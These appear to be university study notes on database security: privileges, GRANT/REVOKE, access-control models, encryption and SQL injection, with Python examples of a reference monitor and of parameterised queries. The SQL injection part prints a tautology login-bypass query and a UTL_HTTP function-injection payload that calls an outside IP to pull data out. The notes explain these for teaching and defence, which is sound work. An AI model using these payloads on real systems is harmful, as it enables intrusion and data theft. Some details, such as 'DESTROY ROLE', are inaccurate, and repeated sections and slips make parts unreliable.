DBMS-unit 5-database security

anna university

UNIT- 5

Database Security

1. Define database privilege.

A privilege is a right to execute a particular type of SQL statement or to access another user's object.
E.g. the right to connect to the database,
the right to create a table,
the right to select rows from another user's table,
the right to execute another user's stored procedure.

2. What is a threat?
A threat is any situation, event or person that will adversely affect database security and the
smooth and efficient functioning of the organization.
A threat may be caused by a situation or event involving a person, action or circumstance that is
likely to bring harm to the organization.

3. Define Database security.


Database security concerns the use of a broad range of information security controls to protect
databases (potentially including the data, the database applications or stored functions, the database
systems, the database servers and the associated network links) against compromises of their
confidentiality, integrity and availability.

4. Mention the users of database.


Database administrators
Security officers
Network administrators
Application developers
Application administrators
DB users

5. What does database security refer to?


Database security refers to the protection from unauthorized access and malicious destruction or
alteration.
6. List some security violations (or) name any forms of malicious access.
Unauthorized Reading of data
Unauthorized modification of data
Unauthorized destruction of data.
7. List the types of authorization.
Read authorization
Write authorization
Update authorization
Drop authorization
8. What is authorization graph?
Passing of authorization from one user to another can be represented by an authorization graph.

9. List the various user authorizations to modify the database schema.


Index Authorization
Resource authorization
Alteration authorization
Drop authorization

10. What are audit trails?


An audit trail is a log of all changes to the database along with information such as which user
performed the change and when the change was performed.

11. What are the benefits of database encryption?

It ensures guaranteed access to encrypted data by authorized users by automating storage and back-up
of mission-critical master encryption keys. It simplifies data privacy compliance obligations and
reporting activities through the use of security-certified encryption and key management that
enforces critical best practices and other standards of due care.

12. Name the various privileges in SQL.


Delete
Select
Insert
Update

13. Mention the various user privileges.


All privileges directly granted to the user or role.
All privileges granted to roles that have been granted to the user or role.

14. Give the limitations of SQL authorization.


The code for checking authorization becomes intermixed with the rest of the application code.
Implementing authorization through application code rather than specifying it declaratively in SQL
makes it hard to ensure the absence of loopholes.

15. What does authentication refer to? List some authentication techniques.


Authentication refers to the task of verifying the identity of a person.
Authentication techniques:
Challenge response scheme
Digital Signatures
Non repudiation
1. Explain threats and risks in database security.
(OR)
Present an overview of database security.
Database security concerns the use of a broad range of information security controls to protect
databases (potentially including the data, the database applications or stored functions, the database
systems, the database servers and the associated network links) against compromises of their
confidentiality, integrity and availability. It involves various types or categories of controls, such
as technical, procedural/administrative and physical. Database security is a specialist topic within
the broader realms of computer security, information security and risk management.
Types of Security
Database security is a broad area that addresses many issues, including the following:
■ Various legal and ethical issues regarding the right to access certain information
■ Policy issues at the governmental, institutional, or corporate level as to what kinds of information
should not be made publicly available—for example, credit ratings and personal medical records.
■ System-related issues such as the system levels at which various security functions should be
enforced—for example, whether a security function should be handled at the physical hardware
level, the operating system level, or the DBMS level.
■ The need in some organizations to identify multiple security levels and to categorize the data and
users based on these classifications—for example, top secret, secret, confidential, and unclassified.
Threats to databases
Loss of integrity
Loss of availability
Loss of confidentiality
To protect databases against these types of threats four kinds of countermeasures can be
implemented:
Access control: user accounts, passwords
Inference control: when statistical databases are used
Flow control: to avoid sensitive data reaching unauthorized users
Encryption
Threats
Excessive and Unused Privileges
Privilege Abuse
SQL Injection
Malware
Weak Audit Trail
Storage Media Exposure

Exploitation of Vulnerabilities
Misconfigured Databases
Unmanaged Sensitive Data
Denial of Service
Security risk to Database System:
Security risks to database systems include, for example:
Unauthorized or unintended activity or misuse by authorized database users, database
administrators, or network/systems managers, or by unauthorized users or hackers
(e.g. inappropriate access to sensitive data, metadata or functions within databases, or inappropriate
changes to the database programs, structures or security configurations);
Malware infections causing incidents such as unauthorized access, leakage or disclosure of
personal or proprietary data, deletion of or damage to the data or programs, interruption or denial of
authorized access to the database, attacks on other systems and the unanticipated failure of database
services;
Overloads, performance constraints and capacity issues resulting in the inability of authorized
users to use databases as intended;
Physical damage to database servers caused by computer room fires or floods, overheating,
lightning, accidental liquid spills, static discharge, electronic breakdowns/equipment failures and
obsolescence;
Design flaws and programming bugs in databases and the associated programs and systems,
creating various security vulnerabilities (e.g. unauthorized privilege escalation), data
loss/corruption, performance degradation etc.;
Data corruption and/or loss caused by the entry of invalid data or commands, mistakes in
database or system administration processes, sabotage/criminal damage.

2. Explain the types of privileges in a database language.


A privilege is a right to execute a particular type of SQL statement or to access another user's object.
Some examples of privileges include the right to:
Connect to the database
Create a table
Select rows from another user's table
Execute another user's stored procedure
You grant privileges to users so that they can accomplish the tasks required for their jobs.
You should grant a privilege only to a user who requires that privilege to accomplish the
necessary work. Excessive granting of unnecessary privileges can compromise security.
A user can receive a privilege in two different ways:
You can grant privileges to users explicitly. For example, you can explicitly grant to user SCOTT
the privilege to insert records into the employees table.
You can also grant privileges to a role (a named group of privileges), and then grant the role to one
or more users. For example, you can grant the privileges to select, insert, update, and delete records
from the employees table to the role named clerk, which in turn you can grant to users scott and
brian.
Types:
System Privileges
Schema Object Privileges
Table Privileges
View Privileges
Procedure Privileges
Type Privileges
In some cases it is desirable to grant a privilege to a user temporarily. For example,
The owner of a relation may want to grant the SELECT privilege to a user for a specific task and
then revoke that privilege once the task is completed.
Hence, a mechanism for revoking privileges is needed. In SQL, a REVOKE command is
included for the purpose of canceling privileges.
Suppose that the DBA creates four accounts
A1, A2, A3, A4 and wants only A1 to be able to create base relations. Then the DBA must issue
the following GRANT command in SQL
GRANT CREATETAB TO A1;
In SQL the same effect can be accomplished by having the DBA issue a CREATE
SCHEMA command as follows:
CREATE SCHEMA EXAMPLE AUTHORIZATION A1;
User account A1 can create tables under the schema called EXAMPLE.
Suppose that A1 creates the two base relations EMPLOYEE and DEPARTMENT.
A1 is then the owner of these two relations and hence holds all the relation privileges on each of them.
Suppose that A1 wants to grant A2 the privilege to insert and delete tuples in both of these
relations, but A1 does not want A2 to be able to propagate these privileges to additional accounts:
GRANT INSERT, DELETE ON EMPLOYEE, DEPARTMENT TO A2;
Suppose that A1 decides to revoke the SELECT privilege on the EMPLOYEE relation from
A3; A1 can issue:
REVOKE SELECT ON EMPLOYEE FROM A3;

3. Explain types of database security and database security issues.


Database security issues
Types of Security
Legal and ethical issues
Policy issues
System-related issues
The need to identify multiple security levels
Threats to databases
Loss of integrity
Loss of availability
Loss of confidentiality
To protect databases against these types of threats four kinds of countermeasures can be
implemented:
Access control
Inference control
The security mechanism of a DBMS must include provisions for restricting access to the
database as a whole. This function is called access control and is handled by creating user
accounts and passwords to control the login process by the DBMS.
A second security problem associated with databases is that of controlling access to a statistical
database, which is used to provide statistical information or summaries of values based on various
criteria. The countermeasures to the statistical database security problem are called inference
control measures.
Flow control
Another security issue is flow control, which prevents information from flowing in such a
way that it reaches unauthorized users.
Encryption
A final security issue is data encryption, which is used to protect sensitive data (such as credit
card numbers) that is being transmitted via some type of communication network.
The data is encoded using some encoding algorithm.
Types of database security
A DBMS typically includes a database security and authorization subsystem that is responsible
for ensuring the security of portions of a database against unauthorized access.
Types of database security mechanisms:
Discretionary Access Control
Mandatory Access Control
Role based Access Control.
Discretionary Access Control
The typical method of enforcing discretionary access control in a database system is based on
granting and revoking privileges.
Types of Discretionary Privileges
The account level:
□At this level, the DBA specifies the particular privileges that each account holds independently of
the relations in the database.
□The privileges at the account level apply to the capabilities provided to the account itself and can
include
□The CREATE SCHEMA or CREATE TABLE privilege, to create a schema or base relation;
□The CREATE VIEW privilege;
□The ALTER privilege, to apply schema changes such as adding or removing attributes from
relations;
□The DROP privilege, to delete relations or views;
□The MODIFY privilege, to insert, delete, or update tuples;
□The SELECT privilege, to retrieve information from the database by using a SELECT query.
The relation level (or table level):
□At this level, the DBA can control the privilege to access each individual relation or view in the
database.
□This includes base relations and virtual (view) relations.
□To control the granting and revoking of relation privileges, each relation R in a database is
assigned an owner account, which is typically the account that was used when the relation was
created in the first place.
□The owner of a relation is given all privileges on that relation.
□Suppose that the DBA creates four accounts
□A1, A2, A3, A4
□And wants only A1 to be able to create base relations. Then the DBA must issue the following
GRANT command in SQL
GRANT CREATETAB TO A1;
□In SQL2 the same effect can be accomplished by having the DBA issue a CREATE
SCHEMA command as follows:
CREATE SCHEMA EXAMPLE AUTHORIZATION A1;
□Suppose that A1 wants to allow A3 to retrieve information from either of the two tables and also
to be able to propagate the SELECT privilege to other accounts.
□A1 can issue the command:
GRANT SELECT ON EMPLOYEE, DEPARTMENT
TO A3 WITH GRANT OPTION;
Mandatory Access Control and Role-Based Access Control for Multilevel Security
□The discretionary access control techniques of granting and revoking privileges on relations have
traditionally been the main security mechanism for relational database systems.
□This is an all-or-nothing method:
□A user either has or does not have a certain privilege.
□In many applications, an additional security policy is needed that classifies data and users based
on security classes.
□This approach, known as mandatory access control, would typically be combined with the
discretionary access control mechanisms.
□Typical security classes are top secret (TS), secret (S), confidential (C), and unclassified
(U), where TS is the highest level and U the lowest: TS ≥ S ≥ C ≥ U
□The commonly used model for multilevel security, known as the Bell-LaPadula model, classifies
each subject (user, account, program) and object (relation, tuple, column, view, operation) into one
of the security classifications, TS, S, C, or U:
□We refer to the clearance (classification) of a subject S as class(S) and to the classification of an
object O as class(O).
□Two restrictions are enforced on data access based on the subject/object classifications:
□Simple security property: A subject S is not allowed read access to an object O unless class(S) ≥
class (O).
□Star property (or *-property): A subject S is not allowed to write an object O unless class(S) ≤
class(O). This prevents a subject from writing data down to a lower classification.
Role-based access control
□Its basic notion is that permissions are associated with roles, and users are assigned to appropriate
roles.
□Roles can be created using the CREATE ROLE and DESTROY ROLE commands.
□The GRANT and REVOKE commands discussed under DAC can then be used to assign and
revoke privileges from roles.

4. Discuss the access control mechanisms and cryptography methods used to secure the
database.
Access control mechanism
Access control governs which users may access the database and what they may do with it.
Types
Discretionary Access Control
Mandatory Access Control
Role based Access Control.
Discretionary Access Control
The typical method of enforcing discretionary access control in a database system is based on
granting and revoking privileges.
Types of Discretionary Privileges
The account level:
□At this level, the DBA specifies the particular privileges that each account holds independently of
the relations in the database.
□The privileges at the account level apply to the capabilities provided to the account itself and can
include
□The CREATE SCHEMA or CREATE TABLE privilege, to create a schema or base relation;
□The CREATE VIEW privilege;
□The ALTER privilege, to apply schema changes such as adding or removing attributes from
relations;
□The DROP privilege, to delete relations or views;
□The MODIFY privilege, to insert, delete, or update tuples;
□The SELECT privilege, to retrieve information from the database by using a SELECT query.
The relation level (or table level):
□At this level, the DBA can control the privilege to access each individual relation or view in the
database.
□This includes base relations and virtual (view) relations.
□To control the granting and revoking of relation privileges, each relation R in a database is
assigned an owner account, which is typically the account that was used when the relation was
created in the first place.
□The owner of a relation is given all privileges on that relation.
□Suppose that the DBA creates four accounts A1, A2, A3, A4 and wants only A1 to be able to
create base relations. Then the DBA must issue the following
GRANT command in SQL
GRANT CREATETAB TO A1;
□In SQL2 the same effect can be accomplished by having the DBA issue a CREATE
SCHEMA command as follows:
CREATE SCHEMA EXAMPLE AUTHORIZATION A1;
□Suppose that A1 wants to allow A3 to retrieve information from either of the two tables and also
to be able to propagate the SELECT privilege to other accounts.
□A1 can issue the command:
GRANT SELECT ON EMPLOYEE, DEPARTMENT
TO A3 WITH GRANT OPTION;
Mandatory Access Control and Role-Based Access Control for Multilevel Security
□The discretionary access control techniques of granting and revoking privileges on relations have
traditionally been the main security mechanism for relational database systems.
□This is an all-or-nothing method:
□A user either has or does not have a certain privilege.
□In many applications, an additional security policy is needed that classifies data and users based
on security classes.
□This approach, known as mandatory access control, would typically be combined with the
discretionary access control mechanisms.
□Typical security classes are top secret (TS), secret (S), confidential (C), and unclassified
(U), where TS is the highest level and U the lowest: TS ≥ S ≥ C ≥ U
□The commonly used model for multilevel security, known as the Bell-LaPadula model, classifies
each subject (user, account, and program) and object (relation, tuple, column, view, operation) into
one of the security classifications, TS, S, C, or U:
□We refer to the clearance (classification) of a subject S as class(S) and to the classification of an
object O as class(O).
□Two restrictions are enforced on data access based on the subject/object classifications:
□Simple security property: A subject S is not allowed read access to an object O unless class(S) ≥
class (O).
□Star property (or *-property): A subject S is not allowed to write an object O unless class(S) ≤
class(O). This prevents a subject from writing data down to a lower classification.
Role-based access control
□Its basic notion is that permissions are associated with roles, and users are assigned to appropriate
roles.
□Roles can be created using the CREATE ROLE and DESTROY ROLE commands.
□The GRANT and REVOKE commands discussed under DAC can then be used to assign and
revoke privileges from roles.
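The DAC and MAC discussions in questions 3 and 4 above describe two checks that a DBMS applies together: a GRANT-style privilege lookup and the Bell-LaPadula simple security and star properties. The following reference monitor is an added example, not part of these notes; the accounts A1 and A3 and the relations EMPLOYEE and DEPARTMENT follow the text, while their security classes are constructed for the demo.

```python
"""Reference monitor combining the DAC privileges and the Bell-LaPadula (MAC)
rules described in the notes. Added example, not part of the original notes:
accounts A1/A3 and relations EMPLOYEE/DEPARTMENT follow the text; their
security classes and the set of operations are constructed for the demo."""
from dataclasses import dataclass, field

# TS >= S >= C >= U, encoded as integers so class(X) >= class(Y) is a comparison
LEVELS = {"U": 0, "C": 1, "S": 2, "TS": 3}
READ_OPS = {"SELECT"}
WRITE_OPS = {"INSERT", "DELETE", "UPDATE"}


def dominates(higher: str, lower: str) -> bool:
    """True when class(higher) >= class(lower) in the TS > S > C > U ordering."""
    return LEVELS[higher] >= LEVELS[lower]


@dataclass
class Monitor:
    clearance: dict = field(default_factory=dict)       # account -> class(S)
    classification: dict = field(default_factory=dict)  # relation -> class(O)
    privileges: dict = field(default_factory=dict)      # (account, relation) -> set of ops

    def create_relation(self, owner: str, relation: str, level: str) -> None:
        """The creating account owns the relation and receives all privileges on it."""
        self.classification[relation] = level
        self.privileges[(owner, relation)] = READ_OPS | WRITE_OPS

    def grant(self, account: str, relation: str, *ops: str) -> None:
        self.privileges.setdefault((account, relation), set()).update(ops)

    def revoke(self, account: str, relation: str, *ops: str) -> None:
        self.privileges.get((account, relation), set()).difference_update(ops)

    def dac_allows(self, account: str, relation: str, op: str) -> bool:
        """Discretionary check: all-or-nothing, the account either holds op or not."""
        return op in self.privileges.get((account, relation), set())

    def mac_allows(self, account: str, relation: str, op: str) -> bool:
        """Mandatory check: simple security property for reads, *-property for writes."""
        subj, obj = self.clearance[account], self.classification[relation]
        if op in READ_OPS:
            return dominates(subj, obj)   # no read-up: class(S) >= class(O)
        if op in WRITE_OPS:
            return dominates(obj, subj)   # no write-down: class(S) <= class(O)
        raise ValueError(f"unknown operation {op!r}")

    def check(self, account: str, relation: str, op: str) -> tuple:
        """Both mechanisms must agree; the reason string is what an audit trail would record."""
        if not self.dac_allows(account, relation, op):
            return False, "denied by DAC: privilege not granted"
        if not self.mac_allows(account, relation, op):
            rule = "simple security property" if op in READ_OPS else "star property"
            return False, f"denied by MAC: {rule}"
        return True, "allowed"


def build_demo() -> Monitor:
    """Scenario from the notes: A1 owns EMPLOYEE and DEPARTMENT and grants SELECT to A3."""
    m = Monitor(clearance={"A1": "S", "A3": "C"})   # constructed clearances
    m.create_relation("A1", "EMPLOYEE", "C")        # constructed classifications
    m.create_relation("A1", "DEPARTMENT", "S")
    m.grant("A3", "EMPLOYEE", "SELECT")
    m.grant("A3", "DEPARTMENT", "SELECT")
    return m


if __name__ == "__main__":
    m = build_demo()
    for acct, rel, op in [("A3", "EMPLOYEE", "SELECT"), ("A3", "DEPARTMENT", "SELECT"),
                          ("A3", "EMPLOYEE", "INSERT"), ("A1", "DEPARTMENT", "INSERT"),
                          ("A1", "EMPLOYEE", "INSERT")]:
        print(acct, op, rel, "->", m.check(acct, rel, op)[1])
    m.revoke("A3", "EMPLOYEE", "SELECT")
    print("after REVOKE:", m.check("A3", "EMPLOYEE", "SELECT")[1])
```

Note that the owner A1 is refused INSERT on EMPLOYEE even though DAC grants it: its clearance S is higher than the relation's class C, so the star property forbids the write-down.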
Cryptography method to secure the database
□Encryption is a means of maintaining secure data in an insecure environment.
□Encryption consists of applying an encryption algorithm to data using some prespecified
encryption key.
□The resulting data has to be decrypted using a decryption key to recover the original data.
Data and Advanced Encryption Standards (DES)
□DES can provide end-to-end encryption on the channel between the sender A and receiver
B.
□The DES algorithm is a careful and complex combination of two of the fundamental building
blocks of encryption: substitution and permutation (transposition).
□The DES algorithm derives its strength from repeated application of these two techniques for a
total of 16 cycles.
□Plaintext (the original form of the message) is encrypted as blocks of 64 bits.
Public Key Encryption
□Public key algorithms are based on mathematical functions rather than operations on bit patterns.
□They also involve the use of two separate keys, in contrast to conventional encryption, which
uses only one key.
□The use of two keys can have profound consequences in the areas of confidentiality, key
distribution, and authentication.
□The two keys used for public key encryption are referred to as the public key and the private key.
The essential steps are as follows:
□Each user generates a pair of keys to be used for the encryption and decryption of messages.
□Each user places one of the two keys in a public register or other accessible file. This is the public
key. The companion key is kept private (private key).
□If a sender wishes to send a private message to a receiver, the sender encrypts the message using
the receiver’s public key.
□When the receiver receives the message, he or she decrypts it using the receiver’s private key.
□No other recipient can decrypt the message because only the receiver knows his or her private key.
Digital Signatures:
□A digital signature is an example of using encryption techniques to provide authentication services
in e-commerce applications.
□A digital signature is a means of associating a mark unique to an individual with a body of text.
□The mark should be unforgeable, meaning that others should be able to check that the signature
does come from the originator.
□A digital signature consists of a string of symbols.
□Signature must be different for each use.
□This can be achieved by making each digital signature a function of the message that it is signing,
together with a time stamp.
□Public key techniques are the means of creating digital signatures.

SQL Injection
SQL injection is one of the most common threats to a database system. We will discuss it in detail
later in this section. Some of the other frequent attacks on databases are:
■ Unauthorized privilege escalation. This attack is characterized by an individual
attempting to elevate his or her privilege by attacking vulnerable points in the
database systems.
■ Privilege abuse. Whereas unauthorized privilege escalation is done by an
unauthorized user, this attack is performed by a privileged user. For example, an
administrator who is allowed to change student information can use this privilege
to update student grades without the instructor's permission.
■ Denial of service. A denial of service (DOS) attack is an attempt to make resources
unavailable to their intended users. It is a general attack category in which access to
network applications or data is denied to intended users by overflowing the buffer
or consuming resources.
■ Weak authentication. If the user authentication scheme is weak, an attacker can
impersonate the identity of a legitimate user by obtaining her login credentials.

SQL Injection Methods


Web programs and applications that access a database can send commands and data to the
database, as well as display data retrieved from the database through the Web browser. In an SQL
injection attack, the attacker injects a string input through the application, which changes or
manipulates the SQL statement to the attacker's advantage. An SQL injection attack can harm
the database in various ways, such as unauthorized manipulation of the database or retrieval of
sensitive data. It can also be used to execute system-level commands that may cause the system
to deny service to the application. This section describes types of injection attacks.
SQL Manipulation. A manipulation attack, which is the most common type of injection attack,
changes an SQL command in the application—for example, by adding conditions to the WHERE-
clause of a query, or by expanding a query with additional query components using set operations
such as UNION, INTERSECT, or MINUS. Other types of manipulation attacks are also possible.
A typical manipulation attack occurs during database login. For example, suppose that a
simplistic authentication procedure issues the following query and checks to see if any rows were
returned:
SELECT * FROM users WHERE username = 'jake' AND PASSWORD = 'jakespasswd';
The attacker can try to change (or manipulate) the SQL statement as follows:
SELECT * FROM users WHERE username = 'jake' AND (PASSWORD = 'jakespasswd' OR 'x' = 'x');

As a result, the attacker who knows that 'jake' is a valid login of some user is able to log into the
database system as 'jake' without knowing his password and is able to do everything that 'jake'
may be authorized to do to the database system.

Code Injection. This type of attack attempts to add additional SQL statements or commands to
the existing SQL statement by exploiting a computer bug, which is caused by processing invalid
data. The attacker can inject or introduce code into a computer program to change the course of
execution. Code injection is a popular technique for system hacking or cracking to gain
information.
Function Call Injection. In this kind of attack, a database function or operating system function
call is inserted into a vulnerable SQL statement to manipulate the data or make a privileged
system call. For example, it is possible to exploit a function that performs some aspect related to
network communication. In addition, functions that are contained in a customized database
package, or any custom database function, can be executed as part of an SQL query. In particular,
dynamically created SQL queries (see Chapter 10) can be exploited since they are constructed at
runtime.
For example, the dual table is used in the FROM clause of SQL in Oracle when a user needs to run
SQL that does not logically have a table name. To get today's date, we can use:
SELECT SYSDATE FROM dual;

The following example demonstrates that even the simplest SQL statements can be vulnerable.
SELECT TRANSLATE ('user input', 'from_string', 'to_string') FROM dual;

Here, TRANSLATE is used to replace a string of characters with another string of characters.
The TRANSLATE function above will replace the characters of the 'from_string' with the characters
in the 'to_string' one by one. This means that the f will be replaced with the t, the r with the o, the
o with the _, and so on.
This type of SQL statement can be subjected to a function injection attack. Consider the
following example:
SELECT TRANSLATE ('' || UTL_HTTP.REQUEST ('http://129.107.2.1/') || '',
'98765432', '9876') FROM dual;

The user can input the string ('' || UTL_HTTP.REQUEST ('http://129.107.2.1/') || ''), where || is
the concatenation operator, thus requesting a page from a Web server. UTL_HTTP makes
Hypertext Transfer Protocol (HTTP) callouts from SQL. The REQUEST object takes a URL
('http://129.107.2.1/' in this example) as a parameter, contacts that site, and returns the data
(typically HTML) obtained from that site. The attacker could manipulate the string he inputs, as
well as the URL, to include other functions and do other illegal operations. We just used a
dummy example to show conversion of '98765432' to '9876', but the user's intent would be to
access the URL and get sensitive information. The attacker can then retrieve useful
information from the database server (located at the URL that is passed as a parameter) and
send it to the Web server (that calls the TRANSLATE function).

Risks Associated with SQL Injection


SQL injection is harmful and the risks associated with it provide motivation for attackers. Some
of the risks associated with SQL injection attacks are explained below.
■ Database fingerprinting. The attacker can determine the type of database
being used in the backend so that he can use database-specific attacks that
correspond to weaknesses in a particular DBMS.
■ Denial of service. The attacker can flood the server with requests, thus
denying service to valid users, or the attacker can delete some data.
■ Bypassing authentication. This is one of the most common risks, in which
the attacker can gain access to the database as an authorized user and perform
all the desired tasks.
■ Identifying injectable parameters. In this type of attack, the attacker gathers
important information about the type and structure of the back-end
database of a Web application. This attack is made possible by the fact that
the default error page returned by application servers is often overly
descriptive.
■ Executing remote commands. This provides attackers with a tool to execute
arbitrary commands on the database. For example, a remote user can
execute stored database procedures and functions from a remote SQL
interactive interface.
■ Performing privilege escalation. This type of attack takes advantage of logical
flaws within the database to upgrade the access level.

Protection Techniques against SQL Injection


Protection against SQL injection attacks can be achieved by applying certain programming rules
to all Web-accessible procedures and functions. This section describes some of these techniques.
Bind Variables (Using Parameterized Statements). The use of bind variables (also known as
parameters; see Chapter 10) protects against injection attacks and also improves performance.
Consider the following example using Java and JDBC:
PreparedStatement stmt = conn.prepareStatement(
    "SELECT * FROM EMPLOYEE WHERE EMPLOYEE_ID=? AND PASSWORD=?");
stmt.setString(1, employee_id);
stmt.setString(2, password);
Instead of embedding the user input into the statement, the input should be bound to a parameter.
In this example, the value of 'employee_id' is assigned (bound) to the first bind variable (position 1)
and the value of 'password' to the second (position 2), instead of directly passing string parameters
into the SQL text.
Filtering Input (Input Validation). This technique can be used to remove escape characters from
input strings by using the SQL Replace function. For example, the delimiter single quote (') can
be replaced by two single quotes (''). Some SQL manipulation attacks can be prevented by using
this technique, since escape characters can be used to inject manipulation attacks. However,
because there can be a large number of escape characters, this technique is not reliable.
Function Security. Database functions, both standard and custom, should be restricted, as they
can be exploited in SQL function injection attacks.
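The login query from the SQL manipulation discussion above, implemented three ways against an in-memory SQLite table: plain string concatenation (the vulnerable form), the quote-doubling input filter, and bind variables with '?' placeholders as in the JDBC example. This is an added example, not part of these notes; the single users row and the manipulated password input are constructed for the demo.

```python
"""Login check from the SQL-manipulation discussion, implemented three ways against
an in-memory SQLite table: string concatenation (vulnerable), quote-doubling input
filter, and bind variables. Added example, not from the original notes; the users
row and the manipulated input are constructed for the demo."""
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # The notes' simplistic scheme compares plaintext passwords; real systems store hashes.
    conn.execute("INSERT INTO users VALUES ('jake', 'jakespasswd')")
    return conn


def login_concat(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """VULNERABLE: the user input becomes part of the SQL text."""
    sql = ("SELECT * FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def escape_quotes(value: str) -> str:
    """Input filtering as described in the notes: a single quote becomes two single quotes."""
    return value.replace("'", "''")


def login_filtered(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Concatenation plus quote doubling. Stops this payload, but the notes call the
    approach unreliable because every special character in every context must be covered."""
    sql = ("SELECT * FROM users WHERE username = '" + escape_quotes(username)
           + "' AND password = '" + escape_quotes(password) + "'")
    return conn.execute(sql).fetchone() is not None


def login_bound(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """SAFE: '?' placeholders, the sqlite3 equivalent of the JDBC PreparedStatement
    in the notes. The driver passes the values separately; they never alter the SQL text."""
    sql = "SELECT * FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


# Constructed password input. Concatenated, the predicate becomes
#   password = '' OR 'x' = 'x'
# which is the same always-true condition as the manipulated statement in the notes.
MANIPULATED_PASSWORD = "' OR 'x' = 'x"


def run_demo() -> dict:
    """Outcome of each login variant for a correct, a wrong and a manipulated password."""
    conn = make_db()
    results = {}
    variants = [("concat", login_concat), ("filtered", login_filtered), ("bound", login_bound)]
    for label, fn in variants:
        results[label] = {
            "correct": fn(conn, "jake", "jakespasswd"),
            "wrong": fn(conn, "jake", "not-the-password"),
            "manipulated": fn(conn, "jake", MANIPULATED_PASSWORD),
        }
    return results


if __name__ == "__main__":
    for label, outcome in run_demo().items():
        print(f"{label:9s}", outcome)
```

Only the concatenated variant accepts the manipulated input; with bind variables the same string is compared as a literal password value and the login fails as it should.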
